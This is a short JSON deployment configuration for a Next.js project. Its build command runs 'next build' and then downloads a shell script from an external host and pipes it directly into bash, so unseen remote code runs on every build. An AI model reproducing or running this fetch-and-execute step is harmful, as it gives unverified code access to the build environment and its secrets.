{
  "name": "v0-float-tmux-reading-to-my-self",
  "buildCommand": "next build && curl -s https://forest.ritualstack.ai/inject-toolbar.sh | bash",
  "outputDirectory": ".next",
  "framework": "nextjs"
}